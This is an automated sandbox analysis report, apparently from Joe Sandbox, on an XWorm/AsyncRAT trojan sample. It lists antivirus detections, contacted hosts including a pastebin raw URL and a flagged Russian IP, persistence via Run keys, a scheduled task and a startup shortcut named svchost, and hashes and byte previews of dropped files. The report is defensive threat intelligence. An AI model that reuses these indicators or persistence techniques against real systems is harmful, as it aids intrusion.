other signatures 8->74 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 68 Antivirus detection for dropped file 13->68 70 Multi AV Scanner detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 file6 signatures7 process8 signatures9 60 Loading BitLocker PowerShell Module 19->60 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      a9YMw44iQq.exe76%ReversingLabsWin32.Exploit.Xworm
                      a9YMw44iQq.exe100%AviraTR/Spy.Gen
                      a9YMw44iQq.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\ProgramData\svchost.exe100%AviraTR/Spy.Gen
                      C:\ProgramData\svchost.exe100%Joe Sandbox ML
                      C:\ProgramData\svchost.exe76%ReversingLabsWin32.Exploit.Xworm
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.microsoft.coJ0%Avira URL Cloudsafe
                      http://www.microsoft.coK0%Avira URL Cloudsafe
                      http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                      http://crl.microsx0%Avira URL Cloudsafe
                      http://crl.miB0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        pastebin.com
                        172.67.19.24
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://pastebin.com/raw/vJmE27frfalse
                            high
                            http://ip-api.com/line/?fields=hostingfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.microsoft.coJpowershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.microa9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD80000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.microsoft.coKpowershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.miBpowershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ion=v4.5powershell.exe, 00000008.00000002.2458910527.000002AD747D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000002.00000002.2226616420.0000023378537000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.microsoft.copowershell.exe, 00000002.00000002.2226475493.0000023378450000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Iconpowershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.microsxpowershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namea9YMw44iQq.exe, 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            208.95.112.1
                                                            ip-api.comUnited States
                                                            53334TUT-ASUSfalse
                                                            172.67.19.24
                                                            pastebin.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            5.166.171.54
                                                            unknownRussian Federation
                                                            12768ER-TELECOM-ASRUtrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1570400
                                                            Start date and time:2024-12-06 22:50:09 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 13s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:20
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:a9YMw44iQq.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@21/21@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 10%
                                                            HCA Information:
                                                            • Successful, ratio: 99%
                                                            • Number of executed functions: 95
                                                            • Number of non-executed functions: 6
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 2444 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 4044 because it is empty
                                                            • Execution Graph export aborted for target svchost.exe, PID 1016 because it is empty
                                                            • Execution Graph export aborted for target svchost.exe, PID 2716 because it is empty
                                                            • Execution Graph export aborted for target svchost.exe, PID 4148 because it is empty
                                                            • Execution Graph export aborted for target svchost.exe, PID 5832 because it is empty
                                                            • Execution Graph export aborted for target svchost.exe, PID 6400 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • VT rate limit hit for: a9YMw44iQq.exe
                                                            TimeTypeDescription
                                                            16:51:04API Interceptor53x Sleep call for process: powershell.exe modified
                                                            16:51:52API Interceptor317545x Sleep call for process: a9YMw44iQq.exe modified
                                                            22:51:53Task SchedulerRun new task: svchost path: C:\ProgramData\svchost.exe
                                                            22:51:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
                                                            22:52:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
                                                            22:52:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            208.95.112.1ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                            • ip-api.com/json/
                                                            5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • ip-api.com/json/
                                                            e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • ip-api.com/json/
                                                            Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            172.67.19.24sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            pastebin.comnlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                            • 172.67.19.24
                                                            cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            vortex.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                            • 104.20.3.235
                                                            MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                            • 172.67.19.24
                                                            msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 104.20.3.235
                                                            Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.19.24
                                                            asegurar.vbsGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            crypted_LummaC2.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.19.24
                                                            crypted_LummaC2 (3).exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.19.24
                                                            'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.20.4.235
                                                            ip-api.comozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 208.95.112.1
                                                            a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 208.95.112.1
                                                            CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • 208.95.112.1
                                                            e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • 208.95.112.1
                                                            Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                            • 208.95.112.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ER-TELECOM-ASRUla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 46.146.25.127
                                                            sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 46.146.139.233
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 46.146.98.8
                                                            yakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 5.166.189.202
                                                            http://www.goo.su/c1Rnox/Get hashmaliciousUnknownBrowse
                                                            • 81.19.89.17
                                                            http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                            • 81.19.78.78
                                                            https://lenta.ru/articles/2023/01/13/darkpr/Get hashmaliciousHTMLPhisherBrowse
                                                            • 81.19.82.12
                                                            http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
                                                            • 81.19.78.76
                                                            http://www.euroluxstore.com/Get hashmaliciousUnknownBrowse
                                                            • 81.19.89.17
                                                            botx.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 46.146.187.176
                                                            CLOUDFLARENETUSnlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                            • 172.67.19.24
                                                            Fw Your flight has been cancelled.emlGet hashmaliciousUnknownBrowse
                                                            • 104.17.247.203
                                                            https://login.officeteam.didgim.com/factpath/resources/patch/047620476204762098/?tpj=PlKRhyZP6wwT3cO_YX5-vBD5GuXYTvvU?SehS24G3uU3qw64njI8IZH7gQJoi5rbp7C2uDZbPGel89LOXSbLkxzcBkcMiAnricyOgDlVZzgK16brTMbOGyuYoLIN4U0HH714JGet hashmaliciousReCaptcha PhishBrowse
                                                            • 104.16.124.96
                                                            Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                            • 104.21.40.3
                                                            https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousUnknownBrowse
                                                            • 104.21.16.114
                                                            Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                            • 104.21.40.3
                                                            https://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                                                            • 172.67.211.61
                                                            https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.26.9.44
                                                            https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                                                            • 104.18.95.41
                                                            TUT-ASUSozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 208.95.112.1
                                                            a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 208.95.112.1
                                                            CPym6H29BR.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • 208.95.112.1
                                                            e2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                            • 208.95.112.1
                                                            Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                            • 208.95.112.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                            • 172.67.19.24
                                                            https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                            • 172.67.19.24
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.19.24
                                                            BGM LAW GROUP - RFP 2024.pdfGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 172.67.19.24
                                                            Shipping Documents 72908672134.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.19.24
                                                            https://app.droplet.io/form/K47rYNGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            QUOTE_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            QUOTE_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            vUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                            • 172.67.19.24
                                                            No context
                                                            Process:C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):82944
                                                            Entropy (8bit):5.938591313720819
                                                            Encrypted:false
                                                            SSDEEP:1536:NfFb0NWmGRk7di8n/7IbDqS8a1gMGT6tVOUVprKsZ:NBrk7dHIbDMMJVOUVpdZ
                                                            MD5:F068A2F351D11284FEE8D768A64F6C9C
                                                            SHA1:6FCBA43B6B6024C8795D699F638444654714C276
                                                            SHA-256:4854A1611616F474D7241DC0268F913F92887A383A81E2DBA1186C358CF93F22
                                                            SHA-512:856C01CFBDE2B8A41564A77F07B5561D69679DA6A0AF8DA86D6DC869309D04CABAC0A06C37560456E8BF6DFA0F04E342B57F2AFBCB5DDBF4D0BBE06944387FF2
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.Rg.................:...........X... ...`....@.. ....................................@..................................W..O....`............................................................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B.................W......H........n..........&.....................................................(....*.r...p*. ..z.*..(....*.rC..p*. ....*.s.........s.........s.........s.........*.r...p*. .x!.*.rM..p*. E/..*.r...p*. `..*.r...p*. .i..*.r\..p*..((...*.r...p*. ..?.*.r...p*. }p..*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&()...&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.rv..p*. .y4.*.r;..p*. r.m.*.r...p*. .O..*.r...p*.r...p*. .,>.*.rO..p*. .T..*.r...p*. ...*.r..
                                                            Process:C:\ProgramData\svchost.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):654
                                                            Entropy (8bit):5.380476433908377
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):35
                                                            Entropy (8bit):3.7071562309216133
                                                            Encrypted:false
                                                            SSDEEP:3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
                                                            MD5:BFABEC865892A34F532FABF984F7E156
                                                            SHA1:3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
                                                            SHA-256:8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
                                                            SHA-512:CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
                                                            Malicious:false
                                                            Preview:....### explorer ###..[WIN]r[WIN]r
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
